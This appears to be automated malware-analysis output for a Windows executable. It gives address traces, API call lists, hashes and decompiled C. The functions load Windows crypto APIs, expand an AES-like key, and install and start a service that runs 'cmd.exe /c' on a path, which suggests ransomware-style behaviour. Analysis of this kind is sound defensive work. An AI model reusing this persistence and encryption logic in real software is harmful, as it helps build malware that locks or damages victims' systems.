                                                            0x00406e20
                                                            0x00406e28
                                                            0x00406e2c
                                                            0x00406e3c
                                                            0x00406e3e
                                                            0x00406e41
                                                            0x00406e44
                                                            0x00406e46
                                                            0x00406e61
                                                            0x00406e6b
                                                            0x00406e6d
                                                            0x00406e78
                                                            0x00406e7a
                                                            0x00406e7c
                                                            0x00406e7c
                                                            0x00406e7e
                                                            0x00406e82
                                                            0x00406e88
                                                            0x00406e8a
                                                            0x00406e8a
                                                            0x00406e96
                                                            0x00406e98
                                                            0x00406e98
                                                            0x00406ea3
                                                            0x00406ea5
                                                            0x00406ea5
                                                            0x00406eae
                                                            0x00406eb0
                                                            0x00406eb0
                                                            0x00406ebb
                                                            0x00406ebd
                                                            0x00406ebd
                                                            0x00406eca
                                                            0x00406ed3
                                                            0x00406ee6
                                                            0x00406ef2
                                                            0x00406ef5
                                                            0x00406efb
                                                            0x00406efe
                                                            0x00406f05
                                                            0x00406f08
                                                            0x00406f0e
                                                            0x00406f14
                                                            0x00406f1a
                                                            0x00406f20
                                                            0x00406f26
                                                            0x00406f2c
                                                            0x00407037
                                                            0x00407039
                                                            0x0040703b
                                                            0x0040703c
                                                            0x00407041
                                                            0x00407048
                                                            0x0040704f
                                                            0x0040705a
                                                            0x00000000
                                                            0x00406f32
                                                            0x00406f32
                                                            0x00406f3a
                                                            0x00406f41
                                                            0x00406f45
                                                            0x00406f4d
                                                            0x00406f5d
                                                            0x00000000
                                                            0x00000000
                                                            0x00406f62
                                                            0x00406f6c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406f6e
                                                            0x00406f73
                                                            0x00406f81
                                                            0x00406f86
                                                            0x00406f89
                                                            0x00406f8f
                                                            0x00406f92
                                                            0x00406f94
                                                            0x00406f99
                                                            0x00406f9e
                                                            0x00406fba
                                                            0x00406fc0
                                                            0x00406fc4
                                                            0x00406fc4
                                                            0x00406fcc
                                                            0x00406fce
                                                            0x00406fd3
                                                            0x00406fd8
                                                            0x00406ff4
                                                            0x00406ffb
                                                            0x00406ffb
                                                            0x00407005
                                                            0x00407007
                                                            0x0040702a
                                                            0x00407031
                                                            0x00407031
                                                            0x00000000
                                                            0x00407005
                                                            0x00406f2c
                                                            0x00000000
                                                            0x00406e0f
                                                            0x00406dd0
                                                            0x00406dcb
                                                            0x00000000
                                                            0x00406dcb
                                                            0x00406d80
                                                            0x00406d83
                                                            0x00000000
                                                            0x00406d88
                                                            0x00000000
                                                            0x00406d40
                                                            0x00406d02
                                                            0x00406cf9
                                                            0x00406cf9
                                                            0x00000000
                                                            0x00406cf9
                                                            0x00406cf4
                                                            0x00000000
                                                            0x00406cf4
                                                            0x00000000
                                                            0x00406c81
                                                            0x00406c83
                                                            0x00406ca2
                                                            0x00406ca7
                                                            0x00406caa
                                                            0x00406cae
                                                            0x00406cb1
                                                            0x00406cb7
                                                            0x00406cbd
                                                            0x00406cc3
                                                            0x00406cc9
                                                            0x00406ccf
                                                            0x00406cd5
                                                            0x00406cdb
                                                            0x00406ce1
                                                            0x00407060
                                                            0x00000000
                                                            0x00407060
                                                            0x00406c91
                                                            0x00000000
                                                            0x00406c96

                                                            APIs
                                                            • memcpy.MSVCRT(?,?,0000012C,?), ref: 00406C91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: /../$/..\$\../$\..\
                                                            • API String ID: 3510742995-3885502717
                                                            • Opcode ID: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
                                                            • Instruction ID: 8d35de4500b3f4065ad8a7d009fa2f60231b6be20ed9f01f65d9d1a3966dd706
                                                            • Opcode Fuzzy Hash: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
                                                            • Instruction Fuzzy Hash: 98D147729082459FDB15CF68C881AEABBF4EF05300F15857FE49AB7381C738A915CB98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00401A45() {
                                                            				void* _t1;
                                                            				_Unknown_base(*)()* _t9;
                                                            				struct HINSTANCE__* _t11;
                                                            				intOrPtr _t15;
                                                            				intOrPtr _t17;
                                                            				intOrPtr _t18;
                                                            				intOrPtr _t19;
                                                            				intOrPtr _t20;
                                                            				intOrPtr _t21;
                                                            
                                                            				_t15 =  *0x40f894; // 0x0
                                                            				if(_t15 != 0) {
                                                            					L8:
                                                            					_t1 = 1;
                                                            					return _t1;
                                                            				}
                                                            				_t11 = LoadLibraryA("advapi32.dll");
                                                            				if(_t11 == 0) {
                                                            					L9:
                                                            					return 0;
                                                            				}
                                                            				 *0x40f894 = GetProcAddress(_t11, "CryptAcquireContextA");
                                                            				 *0x40f898 = GetProcAddress(_t11, "CryptImportKey");
                                                            				 *0x40f89c = GetProcAddress(_t11, "CryptDestroyKey");
                                                            				 *0x40f8a0 = GetProcAddress(_t11, "CryptEncrypt");
                                                            				 *0x40f8a4 = GetProcAddress(_t11, "CryptDecrypt");
                                                            				_t9 = GetProcAddress(_t11, "CryptGenKey");
                                                            				_t17 =  *0x40f894; // 0x0
                                                            				 *0x40f8a8 = _t9;
                                                            				if(_t17 == 0) {
                                                            					goto L9;
                                                            				}
                                                            				_t18 =  *0x40f898; // 0x0
                                                            				if(_t18 == 0) {
                                                            					goto L9;
                                                            				}
                                                            				_t19 =  *0x40f89c; // 0x0
                                                            				if(_t19 == 0) {
                                                            					goto L9;
                                                            				}
                                                            				_t20 =  *0x40f8a0; // 0x0
                                                            				if(_t20 == 0) {
                                                            					goto L9;
                                                            				}
                                                            				_t21 =  *0x40f8a4; // 0x0
                                                            				if(_t21 == 0 || _t9 == 0) {
                                                            					goto L9;
                                                            				} else {
                                                            					goto L8;
                                                            				}
                                                            			}












                                                            0x00401a48
                                                            0x00401a4f
                                                            0x00401aec
                                                            0x00401aee
                                                            0x00000000
                                                            0x00401aee
                                                            0x00401a60
                                                            0x00401a64
                                                            0x00401af1
                                                            0x00000000
                                                            0x00401af1
                                                            0x00401a7f
                                                            0x00401a8c
                                                            0x00401a99
                                                            0x00401aa6
                                                            0x00401ab3
                                                            0x00401ab8
                                                            0x00401aba
                                                            0x00401ac0
                                                            0x00401ac6
                                                            0x00000000
                                                            0x00000000
                                                            0x00401ac8
                                                            0x00401ace
                                                            0x00000000
                                                            0x00000000
                                                            0x00401ad0
                                                            0x00401ad6
                                                            0x00000000
                                                            0x00000000
                                                            0x00401ad8
                                                            0x00401ade
                                                            0x00000000
                                                            0x00000000
                                                            0x00401ae0
                                                            0x00401ae6
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
                                                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
                                                            • GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
                                                            • GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
                                                            • GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
                                                            • GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
                                                            • GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                                                            • API String ID: 2238633743-2459060434
                                                            • Opcode ID: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
                                                            • Instruction ID: 9aae3444cc52ced5e7e1ad1d2a06d11cf911cb2b3a933a05a08c6ba10b936042
                                                            • Opcode Fuzzy Hash: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
                                                            • Instruction Fuzzy Hash: 20011E32A86311EBDB30AFA5AE856677AE4EA41750368843FB104B2DB1D7F81448DE5C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00401CE8(intOrPtr _a4) {
                                                            				void* _v8;
                                                            				int _v12;
                                                            				void* _v16;
                                                            				char _v1040;
                                                            				void* _t12;
                                                            				void* _t13;
                                                            				void* _t31;
                                                            				int _t32;
                                                            
                                                            				_v12 = 0;
                                                            				_t12 = OpenSCManagerA(0, 0, 0xf003f);
                                                            				_v8 = _t12;
                                                            				if(_t12 != 0) {
                                                            					_t13 = OpenServiceA(_t12, 0x40f8ac, 0xf01ff);
                                                            					_v16 = _t13;
                                                            					if(_t13 == 0) {
                                                            						sprintf( &_v1040, "cmd.exe /c \"%s\"", _a4);
                                                            						_t31 = CreateServiceA(_v8, 0x40f8ac, 0x40f8ac, 0xf01ff, 0x10, 2, 1,  &_v1040, 0, 0, 0, 0, 0);
                                                            						if(_t31 != 0) {
                                                            							StartServiceA(_t31, 0, 0);
                                                            							CloseServiceHandle(_t31);
                                                            							_v12 = 1;
                                                            						}
                                                            						_t32 = _v12;
                                                            					} else {
                                                            						StartServiceA(_t13, 0, 0);
                                                            						CloseServiceHandle(_v16);
                                                            						_t32 = 1;
                                                            					}
                                                            					CloseServiceHandle(_v8);
                                                            					return _t32;
                                                            				}
                                                            				return 0;
                                                            			}











                                                            0x00401cfb
                                                            0x00401cfe
                                                            0x00401d06
                                                            0x00401d09
                                                            0x00401d21
                                                            0x00401d29
                                                            0x00401d2c
                                                            0x00401d54
                                                            0x00401d7b
                                                            0x00401d7f
                                                            0x00401d84
                                                            0x00401d8b
                                                            0x00401d91
                                                            0x00401d91
                                                            0x00401d98
                                                            0x00401d2e
                                                            0x00401d31
                                                            0x00401d3a
                                                            0x00401d42
                                                            0x00401d42
                                                            0x00401d9e
                                                            0x00000000
                                                            0x00401da7
                                                            0x00000000

                                                            APIs
                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00401CFE
                                                            • OpenServiceA.ADVAPI32(00000000,0040F8AC,000F01FF), ref: 00401D21
                                                            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401D31
                                                            • CloseServiceHandle.ADVAPI32(?), ref: 00401D3A
                                                            • CloseServiceHandle.ADVAPI32(?), ref: 00401D9E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseHandleOpen$ManagerStart
                                                            • String ID: cmd.exe /c "%s"
                                                            • API String ID: 1485051382-955883872
                                                            • Opcode ID: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
                                                            • Instruction ID: 93977d8af42d47d1d9866270745c8e9c50065656b45fe828c5c40e24baaa5e60
                                                            • Opcode Fuzzy Hash: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
                                                            • Instruction Fuzzy Hash: 6411AF71900118BBDB205B659E4CE9FBF7CEF85745F10407AF601F21A0CA744949DB68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 54%
                                                            			E00402A76(void* __ecx, signed int _a4, void* _a6, void* _a7, signed int _a8, signed int _a12, signed char* _a16) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				char _v24;
                                                            				int _t193;
                                                            				signed int _t198;
                                                            				int _t199;
                                                            				intOrPtr _t200;
                                                            				signed int* _t205;
                                                            				signed char* _t206;
                                                            				signed int _t208;
                                                            				signed int _t210;
                                                            				signed int* _t216;
                                                            				signed int _t217;
                                                            				signed int* _t220;
                                                            				signed int* _t229;
                                                            				void* _t252;
                                                            				void* _t280;
                                                            				void* _t281;
                                                            				signed int _t283;
                                                            				signed int _t289;
                                                            				signed int _t290;
                                                            				signed char* _t291;
                                                            				signed int _t292;
                                                            				void* _t303;
                                                            				void* _t313;
                                                            				intOrPtr* _t314;
                                                            				void* _t315;
                                                            				intOrPtr* _t316;
                                                            				signed char* _t317;
                                                            				signed char* _t319;
                                                            				signed int _t320;
                                                            				signed int _t322;
                                                            				void* _t326;
                                                            				void* _t327;
                                                            				signed int _t329;
                                                            				signed int _t337;
                                                            				intOrPtr _t338;
                                                            				signed int _t340;
                                                            				intOrPtr _t341;
                                                            				void* _t342;
                                                            				signed int _t345;
                                                            				signed int* _t346;
                                                            				signed int _t347;
                                                            				void* _t352;
                                                            				void* _t353;
                                                            				void* _t354;
                                                            
                                                            				_t352 = __ecx;
                                                            				if(_a4 == 0) {
                                                            					_a8 = 0x40f57c;
                                                            					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
                                                            					_push(0x40d570);
                                                            					_push( &_v24);
                                                            					L0040776E();
                                                            				}
                                                            				_t283 = _a12;
                                                            				_t252 = 0x18;
                                                            				_t342 = 0x10;
                                                            				if(_t283 != _t342 && _t283 != _t252 && _t283 != 0x20) {
                                                            					_t283 =  &_v24;
                                                            					_a8 = 0x40f57c;
                                                            					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
                                                            					_push(0x40d570);
                                                            					_push( &_v24);
                                                            					L0040776E();
                                                            				}
                                                            				_t193 = _a16;
                                                            				if(_t193 != _t342 && _t193 != _t252 && _t193 != 0x20) {
                                                            					_t283 =  &_v24;
                                                            					_a8 = 0x40f57c;
                                                            					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
                                                            					_t193 =  &_v24;
                                                            					_push(0x40d570);
                                                            					_push(_t193);
                                                            					L0040776E();
                                                            				}
                                                            				 *(_t352 + 0x3cc) = _t193;
                                                            				 *(_t352 + 0x3c8) = _t283;
                                                            				memcpy(_t352 + 0x3d0, _a8, _t193);
                                                            				memcpy(_t352 + 0x3f0, _a8,  *(_t352 + 0x3cc));
                                                            				_t198 =  *(_t352 + 0x3c8);
                                                            				_t354 = _t353 + 0x18;
                                                            				if(_t198 == _t342) {
                                                            					_t199 =  *(_t352 + 0x3cc);
                                                            					if(_t199 != _t342) {
                                                            						_t200 = ((0 | _t199 != _t252) - 0x00000001 & 0xfffffffe) + 0xe;
                                                            					} else {
                                                            						_t200 = 0xa;
                                                            					}
                                                            					goto L17;
                                                            				} else {
                                                            					if(_t198 == _t252) {
                                                            						_t200 = ((0 |  *(_t352 + 0x3cc) == 0x00000020) - 0x00000001 & 0x000000fe) + 0xe;
                                                            						L17:
                                                            						 *((intOrPtr*)(_t352 + 0x410)) = _t200;
                                                            						L18:
                                                            						asm("cdq");
                                                            						_t289 = 4;
                                                            						_t326 = 0;
                                                            						_a12 =  *(_t352 + 0x3cc) / _t289;
                                                            						if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
                                                            							L23:
                                                            							_t327 = 0;
                                                            							if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
                                                            								L28:
                                                            								asm("cdq");
                                                            								_t290 = 4;
                                                            								_t291 = _a4;
                                                            								_t345 = ( *((intOrPtr*)(_t352 + 0x410)) + 1) * _a12;
                                                            								_v12 = _t345;
                                                            								_t329 =  *(_t352 + 0x3c8) / _t290;
                                                            								_t205 = _t352 + 0x414;
                                                            								_v8 = _t329;
                                                            								if(_t329 <= 0) {
                                                            									L31:
                                                            									_a8 = _a8 & 0x00000000;
                                                            									if(_t329 <= 0) {
                                                            										L35:
                                                            										if(_a8 >= _t345) {
                                                            											L51:
                                                            											_t206 = 1;
                                                            											_a16 = _t206;
                                                            											if( *((intOrPtr*)(_t352 + 0x410)) <= _t206) {
                                                            												L57:
                                                            												 *((char*)(_t352 + 4)) = 1;
                                                            												return _t206;
                                                            											}
                                                            											_a8 = _t352 + 0x208;
                                                            											do {
                                                            												_t292 = _a12;
                                                            												if(_t292 <= 0) {
                                                            													goto L56;
                                                            												}
                                                            												_t346 = _a8;
                                                            												do {
                                                            													_t208 =  *_t346;
                                                            													_a4 = _t208;
                                                            													 *_t346 =  *0x0040ABFC ^  *0x0040AFFC ^  *0x0040B3FC ^  *(0x40b7fc + (_t208 & 0x000000ff) * 4);
                                                            													_t346 =  &(_t346[1]);
                                                            													_t292 = _t292 - 1;
                                                            												} while (_t292 != 0);
                                                            												L56:
                                                            												_a16 =  &(_a16[1]);
                                                            												_a8 = _a8 + 0x20;
                                                            												_t206 = _a16;
                                                            											} while (_t206 <  *((intOrPtr*)(_t352 + 0x410)));
                                                            											goto L57;
                                                            										}
                                                            										_a16 = 0x40bbfc;
                                                            										do {
                                                            											_t210 =  *(_t352 + 0x410 + _t329 * 4);
                                                            											_a4 = _t210;
                                                            											 *(_t352 + 0x414) =  *(_t352 + 0x414) ^ ((( *0x004089FC ^  *_a16) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t210 & 0x000000ff) + 0x4089fc) & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff;
                                                            											_a16 = _a16 + 1;
                                                            											if(_t329 == 8) {
                                                            												_t216 = _t352 + 0x418;
                                                            												_t303 = 3;
                                                            												do {
                                                            													 *_t216 =  *_t216 ^  *(_t216 - 4);
                                                            													_t216 =  &(_t216[1]);
                                                            													_t303 = _t303 - 1;
                                                            												} while (_t303 != 0);
                                                            												_t217 =  *(_t352 + 0x420);
                                                            												_a4 = _t217;
                                                            												_t220 = _t352 + 0x428;
                                                            												 *(_t352 + 0x424) =  *(_t352 + 0x424) ^ (( *0x004089FC << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t217 & 0x000000ff) + 0x4089fc) & 0x000000ff;
                                                            												_t313 = 3;
                                                            												do {
                                                            													 *_t220 =  *_t220 ^  *(_t220 - 4);
                                                            													_t220 =  &(_t220[1]);
                                                            													_t313 = _t313 - 1;
                                                            												} while (_t313 != 0);
                                                            												L46:
                                                            												_a4 = _a4 & 0x00000000;
                                                            												if(_t329 <= 0) {
                                                            													goto L50;
                                                            												}
                                                            												_t314 = _t352 + 0x414;
                                                            												while(_a8 < _t345) {
                                                            													asm("cdq");
                                                            													_t347 = _a8 / _a12;
                                                            													asm("cdq");
                                                            													_t337 = _a8 % _a12;
                                                            													 *((intOrPtr*)(_t352 + 8 + (_t337 + _t347 * 8) * 4)) =  *_t314;
                                                            													_a4 = _a4 + 1;
                                                            													_t345 = _v12;
                                                            													_t338 =  *_t314;
                                                            													_t314 = _t314 + 4;
                                                            													_a8 = _a8 + 1;
                                                            													 *((intOrPtr*)(_t352 + 0x1e8 + (_t337 + ( *((intOrPtr*)(_t352 + 0x410)) - _t347) * 8) * 4)) = _t338;
                                                            													_t329 = _v8;
                                                            													if(_a4 < _t329) {
                                                            														continue;
                                                            													}
                                                            													goto L50;
                                                            												}
                                                            												goto L51;
                                                            											}
                                                            											if(_t329 <= 1) {
                                                            												goto L46;
                                                            											}
                                                            											_t229 = _t352 + 0x418;
                                                            											_t315 = _t329 - 1;
                                                            											do {
                                                            												 *_t229 =  *_t229 ^  *(_t229 - 4);
                                                            												_t229 =  &(_t229[1]);
                                                            												_t315 = _t315 - 1;
                                                            											} while (_t315 != 0);
                                                            											goto L46;
                                                            											L50:
                                                            										} while (_a8 < _t345);
                                                            										goto L51;
                                                            									}
                                                            									_t316 = _t352 + 0x414;
                                                            									while(_a8 < _t345) {
                                                            										asm("cdq");
                                                            										_a4 = _a8 / _a12;
                                                            										asm("cdq");
                                                            										_t340 = _a8 % _a12;
                                                            										 *((intOrPtr*)(_t352 + 8 + (_t340 + _a4 * 8) * 4)) =  *_t316;
                                                            										_a8 = _a8 + 1;
                                                            										_t341 =  *_t316;
                                                            										_t316 = _t316 + 4;
                                                            										 *((intOrPtr*)(_t352 + 0x1e8 + (_t340 + ( *((intOrPtr*)(_t352 + 0x410)) - _a4) * 8) * 4)) = _t341;
                                                            										_t329 = _v8;
                                                            										if(_a8 < _t329) {
                                                            											continue;
                                                            										}
                                                            										goto L35;
                                                            									}
                                                            									goto L51;
                                                            								}
                                                            								_a8 = _t329;
                                                            								do {
                                                            									_t317 =  &(_t291[1]);
                                                            									 *_t205 = ( *_t291 & 0x000000ff) << 0x18;
                                                            									 *_t205 =  *_t205 | ( *_t317 & 0x000000ff) << 0x00000010;
                                                            									_t319 =  &(_t317[2]);
                                                            									 *_t205 =  *_t205 |  *_t319 & 0x000000ff;
                                                            									_t291 =  &(_t319[1]);
                                                            									_t205 =  &(_t205[1]);
                                                            									_t60 =  &_a8;
                                                            									 *_t60 = _a8 - 1;
                                                            								} while ( *_t60 != 0);
                                                            								goto L31;
                                                            							}
                                                            							_t280 = _t352 + 0x1e8;
                                                            							do {
                                                            								_t320 = _a12;
                                                            								if(_t320 > 0) {
                                                            									memset(_t280, 0, _t320 << 2);
                                                            									_t354 = _t354 + 0xc;
                                                            								}
                                                            								_t327 = _t327 + 1;
                                                            								_t280 = _t280 + 0x20;
                                                            							} while (_t327 <=  *((intOrPtr*)(_t352 + 0x410)));
                                                            							goto L28;
                                                            						}
                                                            						_t281 = _t352 + 8;
                                                            						do {
                                                            							_t322 = _a12;
                                                            							if(_t322 > 0) {
                                                            								memset(_t281, 0, _t322 << 2);
                                                            								_t354 = _t354 + 0xc;
                                                            							}
                                                            							_t326 = _t326 + 1;
                                                            							_t281 = _t281 + 0x20;
                                                            						} while (_t326 <=  *((intOrPtr*)(_t352 + 0x410)));
                                                            						goto L23;
                                                            					}
                                                            					 *((intOrPtr*)(_t352 + 0x410)) = 0xe;
                                                            					goto L18;
                                                            				}
                                                            			}

















































                                                            0x00402a83
                                                            0x00402a85
                                                            0x00402a8e
                                                            0x00402a95
                                                            0x00402a9e
                                                            0x00402aa3
                                                            0x00402aa4
                                                            0x00402aa4
                                                            0x00402aa9
                                                            0x00402aae
                                                            0x00402ab1
                                                            0x00402ab4
                                                            0x00402ac2
                                                            0x00402ac6
                                                            0x00402acd
                                                            0x00402ad6
                                                            0x00402adb
                                                            0x00402adc
                                                            0x00402adc
                                                            0x00402ae1
                                                            0x00402ae6
                                                            0x00402af4
                                                            0x00402af8
                                                            0x00402aff
                                                            0x00402b05
                                                            0x00402b08
                                                            0x00402b0d
                                                            0x00402b0e
                                                            0x00402b0e
                                                            0x00402b14
                                                            0x00402b23
                                                            0x00402b2a
                                                            0x00402b3f
                                                            0x00402b44
                                                            0x00402b4a
                                                            0x00402b4f
                                                            0x00402b75
                                                            0x00402b7d
                                                            0x00402b92
                                                            0x00402b7f
                                                            0x00402b81
                                                            0x00402b81
                                                            0x00000000
                                                            0x00402b51
                                                            0x00402b53
                                                            0x00402b70
                                                            0x00402b94
                                                            0x00402b94
                                                            0x00402b9a
                                                            0x00402ba2
                                                            0x00402ba3
                                                            0x00402ba6
                                                            0x00402bae
                                                            0x00402bb1
                                                            0x00402bcf
                                                            0x00402bcf
                                                            0x00402bd7
                                                            0x00402bf8
                                                            0x00402c00
                                                            0x00402c01
                                                            0x00402c0b
                                                            0x00402c0e
                                                            0x00402c12
                                                            0x00402c15
                                                            0x00402c17
                                                            0x00402c1f
                                                            0x00402c22
                                                            0x00402c4e
                                                            0x00402c4e
                                                            0x00402c54
                                                            0x00402ca5
                                                            0x00402ca8
                                                            0x00402e04
                                                            0x00402e06
                                                            0x00402e0d
                                                            0x00402e10
                                                            0x00402e73
                                                            0x00402e73
                                                            0x00402e7b
                                                            0x00402e7b
                                                            0x00402e18
                                                            0x00402e1b
                                                            0x00402e1b
                                                            0x00402e20
                                                            0x00000000
                                                            0x00000000
                                                            0x00402e22
                                                            0x00402e25
                                                            0x00402e25
                                                            0x00402e29
                                                            0x00402e59
                                                            0x00402e5b
                                                            0x00402e5e
                                                            0x00402e5e
                                                            0x00402e61
                                                            0x00402e61
                                                            0x00402e64
                                                            0x00402e68
                                                            0x00402e6b
                                                            0x00000000
                                                            0x00402e1b
                                                            0x00402cae
                                                            0x00402cb5
                                                            0x00402cb5
                                                            0x00402cbf
                                                            0x00402d05
                                                            0x00402d0b
                                                            0x00402d11
                                                            0x00402d34
                                                            0x00402d3a
                                                            0x00402d3b
                                                            0x00402d3e
                                                            0x00402d40
                                                            0x00402d43
                                                            0x00402d43
                                                            0x00402d46
                                                            0x00402d4e
                                                            0x00402d8f
                                                            0x00402d95
                                                            0x00402d9b
                                                            0x00402d9c
                                                            0x00402d9f
                                                            0x00402da1
                                                            0x00402da4
                                                            0x00402da4
                                                            0x00402da7
                                                            0x00402da7
                                                            0x00402dad
                                                            0x00000000
                                                            0x00000000
                                                            0x00402daf
                                                            0x00402db5
                                                            0x00402dbf
                                                            0x00402dc3
                                                            0x00402dc8
                                                            0x00402dc9
                                                            0x00402dcf
                                                            0x00402ddb
                                                            0x00402dde
                                                            0x00402de4
                                                            0x00402de6
                                                            0x00402de9
                                                            0x00402dec
                                                            0x00402df3
                                                            0x00402df9
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00402df9
                                                            0x00000000
                                                            0x00402db5
                                                            0x00402d16
                                                            0x00000000
                                                            0x00000000
                                                            0x00402d1c
                                                            0x00402d22
                                                            0x00402d25
                                                            0x00402d28
                                                            0x00402d2a
                                                            0x00402d2d
                                                            0x00402d2d
                                                            0x00000000
                                                            0x00402dfb
                                                            0x00402dfb
                                                            0x00000000
                                                            0x00402cb5
                                                            0x00402c56
                                                            0x00402c5c
                                                            0x00402c6a
                                                            0x00402c6e
                                                            0x00402c74
                                                            0x00402c75
                                                            0x00402c7e
                                                            0x00402c8b
                                                            0x00402c91
                                                            0x00402c93
                                                            0x00402c96
                                                            0x00402c9d
                                                            0x00402ca3
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00402ca3
                                                            0x00000000
                                                            0x00402c5c
                                                            0x00402c24
                                                            0x00402c27
                                                            0x00402c2d
                                                            0x00402c2e
                                                            0x00402c36
                                                            0x00402c3f
                                                            0x00402c43
                                                            0x00402c45
                                                            0x00402c46
                                                            0x00402c49
                                                            0x00402c49
                                                            0x00402c49
                                                            0x00000000
                                                            0x00402c27
                                                            0x00402bd9
                                                            0x00402bdf
                                                            0x00402bdf
                                                            0x00402be4
                                                            0x00402bea
                                                            0x00402bea
                                                            0x00402bea
                                                            0x00402bec
                                                            0x00402bed
                                                            0x00402bf0
                                                            0x00000000
                                                            0x00402bdf
                                                            0x00402bb3
                                                            0x00402bb6
                                                            0x00402bb6
                                                            0x00402bbb
                                                            0x00402bc1
                                                            0x00402bc1
                                                            0x00402bc1
                                                            0x00402bc3
                                                            0x00402bc4
                                                            0x00402bc7
                                                            0x00000000
                                                            0x00402bb6
                                                            0x00402b55
                                                            0x00000000
                                                            0x00402b55

                                                            APIs
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402A95
                                                            • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402AA4
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402ACD
                                                            • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402ADC
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402AFF
                                                            • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402B0E
                                                            • memcpy.MSVCRT(?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B2A
                                                            • memcpy.MSVCRT(?,?,?,?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B3F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
